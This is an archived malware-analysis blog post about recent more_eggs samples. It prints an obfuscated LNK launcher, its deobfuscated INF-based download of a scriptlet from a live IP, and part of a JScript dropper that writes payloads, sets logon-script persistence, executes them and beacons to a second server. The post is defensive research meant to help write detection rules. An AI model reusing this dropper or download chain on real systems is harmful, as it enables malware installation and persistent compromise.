{
	"id": "c12a69db-2342-4961-ad2d-f5bb691bcc7e",
	"created_at": "2026-04-06T00:06:35.448746Z",
	"updated_at": "2026-04-10T03:20:18.708521Z",
	"deleted_at": null,
	"sha1_hash": "24d332fc60e13bffb18ef8b5a75c0532576a0bbf",
	"title": "HOW DO YOU LIKE DEM EGGS? I LIKE MINE SCRAMBLED, REALLY SCRAMBELED - A LOOK AT A RECENT more_eggs SAMPLES",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 297491,
	"plain_text": "HOW DO YOU LIKE DEM EGGS? I LIKE MINE\r\nSCRAMBLED, REALLY SCRAMBELED - A LOOK AT A\r\nRECENT more_eggs SAMPLES\r\nBy Mo Bustami\r\nPublished: 2023-03-10 · Archived: 2026-04-05 21:23:22 UTC\r\nBACKGROUND\r\nThis blog will just focus on some recent samples related to what i think is more_eggs and my attempt (successful\r\nor not, I will let you be the judge of that) at analyzing them and some questions I have. I won't be discussing any\r\nattribution or provide my thoughts on that in this blog. \r\nHIGH LEVEL ANALYSIS OF SAMPLES\r\nFile Name: Axiance_Full_Reports[.]zip\r\nHash: 631f92c9147733acf3faa02586cd2a6cda673ec83c24252fccda1982cf3e96f6\r\nThe file is a ZIP file that include an LNK file and a JPG. The LNK as you would expect includes an obfuscated\r\ncode within it that is consistent with these types of campaigns.\r\n\u0026\u0026 c!QlGg!!dFsw!!dFsw!!S5nNX4N6!\"k49ZUgX7=%!pKaN!!fJtJ!!oMCB!!PBuJ!\\!pocM!!nHka!!Vtvt!!Ugrg!!pocM!!Mb\r\n for % t in (\"!vZRh!!hixu!!nHka!!iedc!!cMXL!!pocM!!oLOE!!MbnQ!!DDvC!\"\r\n \"s!pocM!!yysv!!MbnQ!!QlGg!!pKaN!!Ugrg!!iedc!!nHka! = $!Assh!i!MbnQ!!CVhO!o!Assh!!cMXL! n!pKaN\r\n \"!vZRh!!CVhO!!nHka!s!pKaN!!pocM!!MbnQ!!QlGg!!pKaN!!pocM!!oLOE!!MbnQ!!CVhO!!pocM!!iedc!!cMXL!\r\nhttps://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1\r\nPage 1 of 6\n\n\"!opYD!!Vtvt!!IuyJ!!GgqK!!lmPv!!AFHZ!!NjEt!\"\r\n \"!vZRh!!CVhO!!nHka!!IMmt!!QlGg!!Ugrg!!dFsw!!pKaN!!pocM!!MbnQ!s!pKaN!!QlGg!!dFsw!!dFsw!!FEKw!\r\n \"!uZmj!!MbnQ!!jYoa!!nHka!!yysv!!pocM!!cMXL!!pKaN!!nHka!!iedc!!kfTF!!eVUC!!rjNA!!cMXL!!lmPv!!o\r\n \"!CVhO!!nHka!!dFsw!!IMmt!!pocM!!dFsw!!nHka!!cMXL!!lmPv!!opYD!!Vtvt!!IuyJ!!GgqK!\"\r\n \"!vZRh!!oijN!!AFHZ!!pChT!!oijN!!ihiq!!DDvC!\"\r\n \"!PBuJ!!NjEt!!NjEt!!PBuJ!\\!cMXL!!Iiwf!!jYoa!!oLOE!!AeOE!!dwJy!!DBOh!!HYYC!!ySTZ!!DBOh!!ORXc!\r\n \"!vZRh!!opYD!!Vtvt!!IuyJ!!GgqK!!DDvC!\"\r\n \"!pocM!!nHka!!Ugrg!!pocM!!PBuJ!!Vtvt!!pKaN!!yysv!!LlDf!!AFHZ!!PBuJ!!FEKw!!pocM!!MbnQ!!IMmt!\"\r\n \"!vZRh!!cMXL!!pKaN!!iedc!!pocM!!MbnQ!!yysv!!cMXL!]\"\r\n \"!cMXL!!nHka!!iedc!!hixu!!pocM!!Iiwf!!nHka!n!QlGg!m!nHka!!lmPv!!OJQo! '\"\r\n \"!cMXL!!ORXc!!oLOE!!iedc!!pKaN!!cMXL!!hixu!!Iiwf!!MbnQ!!QlGg!!fJtJ!!nHka!!lmPv!!OJQo! '\"\r\n \"!Vtvt!!pKaN!!yysv!!LlDf!!AFHZ!!lmPv!!MbnQ!!pocM!!pKaN!\") do @!nHka!!Iiwf!!ORXc!!oLOE! % ~t)\r\n\"!.%SystemRoot%\\System32\\SHELL32.dll\r\nUsing the magic of cyberchef you can deobfuscate this and get something a bit cleaner \r\n\u0026\u0026 call S5nNX4N6 \"k49ZUgX7=%tmp%\\ie4uinit.exe\" \u0026\u0026 call S5nNX4N6 \"9AB2eyHk=%tmp%\\ieuinit.inf\" \u0026\u0026 (\r\n for % t in (\"[version]\"\r\n \"signature = $windows nt$\"\r\n \"[destinationdirs]\"\r\n \"A45E=01\"\r\n \"[defaultinstall.windows7]\"\r\n \"UnRegisterOCXs=F07FD\"\r\n \"delfiles=A45E\"\r\n \"[F07FD]\"\r\n \"%11%\\scRobj,NI,http://172.86.75.75/robot.php\"\r\n \"[A45E]\"\r\n \"ieui%4tg90%.inf\"\r\n \"[strings]\"\r\n \"servicename=' '\"\r\n \"shortsvcname=' '\"\r\n \"4tg90=nit\") do @echo % ~t) \u003e \"9AB2eyHk\" \u0026\u0026 call copy / Y % windir % \\System32\\ ie4uinit.exe\r\n\".%SystemRoot%\\System32\\SHELL32.dll\r\nDOMO ARIGATO MR ROBOTO\r\nI tried looking for the robot.php file associated with the above IP address in virus repositories but was not\r\nsuccessful, probably due to me getting stale. However, I was able to find a variant of it in an LNK sample\r\nsubmitted to Hybrid Analysis and can be found at VirusTotal. The script is sizeable and heavily obfuscated. the\r\nclosest to any analysis of something similar can be found at this expel blog but still it was not quite the same.\r\nhttps://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1\r\nPage 2 of 6\n\nWhile I can probably spend a whole blog going through the obfuscation and the deobfuscation logic, I would\r\nnever be as good as (@Arkbird_SOLG), thier analysis is referenced in the intro. I also wanted to do this quickly.\r\nAnd as you might know, I have been relying on some old tools in the arsenal that seem to still work against these\r\nobfuscated scripts\r\nAn old friend is a trusted one - Malzilla to the rescue. While the script broke Malzilla, it was still good enough\r\nto produce a deobfuscated output. you can see that I used document.write to get the output of the code\r\nhere is partial output after it was beautified\r\nvar WScriptShell = NWgYzNFhUglH676(cApePRxKlMQqu834(atZLWcjMYNmeC751, uJqroxwXiRZAa975));\r\nvar DropperPath = WScriptShell.ExpandEnvironmentStrings(\"%appdata%\");\r\nDropperPath = DropperPath + \"\\\\Microsoft\\\\\";\r\nvar LoaderFileName = \"6HGRAI3D0RB72LRS.txt\";\r\nvar PersFileName = \"RRALRCEOH5NXDDOJVPNVFH.txt\";\r\nvar MsxslPath = DropperPath + cApePRxKlMQqu834(jHkwPHCIFnWO772, uJqroxwXiRZAa975);\r\nhttps://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1\r\nPage 3 of 6\n\nvar Decoded = MXZzNoSNqRUcKla430(EALrYFeDuAfV488, EALrYFeDuAfV488.length);\r\nvar ba = RyOCxzf831(Decoded, uJqroxwXiRZAa975);\r\nvar objFSO = NWgYzNFhUglH676(cApePRxKlMQqu834('qe)HZkC!=E|gs@q[6l6XsB8,VemdI[$X', uJqroxwXiRZAa975))\r\nif (!objFSO.FileExists(MsxslPath)) {\r\n var actxobj = NWgYzNFhUglH676(cApePRxKlMQqu834(RgpeqURe598, uJqroxwXiRZAa975));\r\n actxobj.open();\r\n actxobj.position = 0;\r\n actxobj.type = 2;\r\n actxobj.charset = (437);\r\n actxobj.writeText(aUxgUyvEj840(ba));\r\n payload = 0;\r\n actxobj.saveToFile(MsxslPath);\r\n actxobj.close();\r\n}\r\nvar DecodedPayer = MXZzNoSNqRUcKla430(qctzvdIf439, qctzvdIf439.length);\r\nvar BBA = RyOCxzf831(DecodedPayer, uJqroxwXiRZAa975);\r\nvar pays = aUxgUyvEj840(BBA);\r\nSaveTextToFile(DropperPath + LoaderFileName, pays);\r\nvar DecodedPers = MXZzNoSNqRUcKla430(EoLfzNlg964, EoLfzNlg964.length);\r\nvar BBS = RyOCxzf831(DecodedPers, uJqroxwXiRZAa975);\r\nvar PersPays = aUxgUyvEj840(BBS);\r\nSaveTextToFile(DropperPath + PersFileName, PersPays);\r\nvar ActXobj1 = NWgYzNFhUglH676(cApePRxKlMQqu834(atZLWcjMYNmeC751, uJqroxwXiRZAa975));\r\nvar CommandToRun = 'cmd /c start /min \"\" \"' + MsxslPath + '\" \"' + DropperPath + LoaderFileName + '\" \"\r\ntry {\r\n ActXobj1.RegWrite(\"HKCU\\\\Environment\\\\UserInitMprLogonScript\", 'cscript /b /e:jscript \"%APPDATA%\\\r\n} catch (e) {}\r\ntry {\r\n var vkxvlqbn570 = NWgYzNFhUglH676(cApePRxKlMQqu834('tFqdph]S\"tSe54u]`%gCA', uJqroxwXiRZAa975));\r\n vkxvlqbn570.ShellExecute(cApePRxKlMQqu834(jHkwPHCIFnWO772, uJqroxwXiRZAa975), LoaderFileName + \"\r\n} catch (e) {}\r\ntry {\r\n var vkxvlqbn570 = GetObject(cApePRxKlMQqu834('6C\"F%ZoiOuIDLit};iJX@QRg|*+XzMAXz{8\"4YN\u003cfk;gZi4nQIu\r\n var vkxvlqbn72 = vkxvlqbn570.Get(cApePRxKlMQqu834('aCAzD@WMfBMlp4p|', uJqroxwXiRZAa975)).Create(C\r\n if (vkxvlqbn72 !== 0) {\r\n vkxvlqbn354;\r\n }\r\n} catch (vkxvlqbn3118) {\r\n try {\r\n ActXobj1.Run(CommandToRun, 0, 0);\r\n vkxvlqbn0937 = 1;\r\n } catch (vkxvlqbn4910) {\r\n vkxvlqbn0937 = 0;\r\n }\r\n}\r\ntry {\r\n var ConnectionLite;\r\nhttps://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1\r\nPage 4 of 6\n\ntry {\r\n ConnectionLite = new ActiveXObject(\"MSXML2.ServerXMLHTTP\");\r\n } catch (e) {\r\n try {\r\n ConnectionLite = new ActiveXObject(\"Msxml2.XMLHTTP.6.0\");\r\n } catch (e) {\r\n try {\r\n ConnectionLite = new ActiveXObject(\"Msxml2.XMLHTTP.3.0\");\r\n } catch (e2) {\r\n ConnectionLite = new ActiveXObject(\"Microsoft.XMLHTTP\");\r\n }\r\n }\r\n }\r\n ConnectionLite.open(\"GET\", \"http://95.179.186.167/Writer.php?deploy=\" + CommandToRun, false);\r\n ConnectionLite.send();\r\n} catch (ee) {}\r\nIf you want to rely on purely online tools, I stumbled across this one here and it seems to be working really well -\r\n https://onecompiler.com/javascript. You will just need to modify the code from document.write to console.log\r\nI hope the above code can be used to write detection and hunting rules, many of the variable names seem to be\r\nstatic once they are decoded so could be good start.\r\nAnd here is where my question or mystery beings. When I tried to do the same for the robot.php script from the\r\noriginal 172.86.75.75, the script seemed to be either missing or not decoding as I would like it to be. I tried\r\nmessing with the logic and see if I missed anything but no dice. I am happy to share the script for anyone else who\r\nwould like to take a look and I also uploaded it to VirusTotal \r\nADDITIONAL SAMPLES\r\nI wanted to see if I can find additional \"recent\" samples of LNK files using similar obfuscation and delivery\r\nmechanism. I hunted using the \"behaviour_files:\"%TEMP%\\\\ieuinit.inf\"\" and according to VirusTotal below are\r\nthe recent ones \r\n631f92c9147733acf3faa02586cd2a6cda673ec83c24252fccda1982cf3e96f6\r\nbfe048ba91218019b64ab8477dad3ba6033cbc584f0d751d2866023b2b546c2e\r\n4ba964764210607f3bab884a14afa0b917891cff969a309bbbc12d3321386352\r\na99508a91168ebebb3779c8a69fbbc8c51cc019ba794b1e5f4c2d7a4c5b0777a\r\n36bf06bde63af8cdd673444edf64a323195fe962b3256e0269cdd7a89a7e2ae1\r\nI did not go hunting for samples of the main obfuscated JS payload but there might be some additional samples\r\nlaying around.\r\nhttps://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1\r\nPage 5 of 6\n\nI did not have time to go and do a telemetry analysis and infrastructure mapping of these campaigns but if I have\r\nsome spare time I might put that down in another blogpost.\r\nONE FINAL EASTER EGG - see what I did there\r\nFor the 172.86.75.75, censys scan showed port 8080 open and it taking a quick look at it, it seemed like it was\r\nsome sort of a C2 panel/access of potential victims, not sure if it is related to this campaign or something else\r\nClicking on any of the buttons seems to potentially could show screenshots from victims emails/browser/etc\r\nSource: https://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1\r\nhttps://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1"
	],
	"report_names": [
		"how-do-you-like-dem-eggs-i-like-mine.html?m=1"
	],
	"threat_actors": [],
	"ts_created_at": 1775433995,
	"ts_updated_at": 1775791218,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/24d332fc60e13bffb18ef8b5a75c0532576a0bbf.pdf",
		"text": "https://archive.orkl.eu/24d332fc60e13bffb18ef8b5a75c0532576a0bbf.txt",
		"img": "https://archive.orkl.eu/24d332fc60e13bffb18ef8b5a75c0532576a0bbf.jpg"
	}
}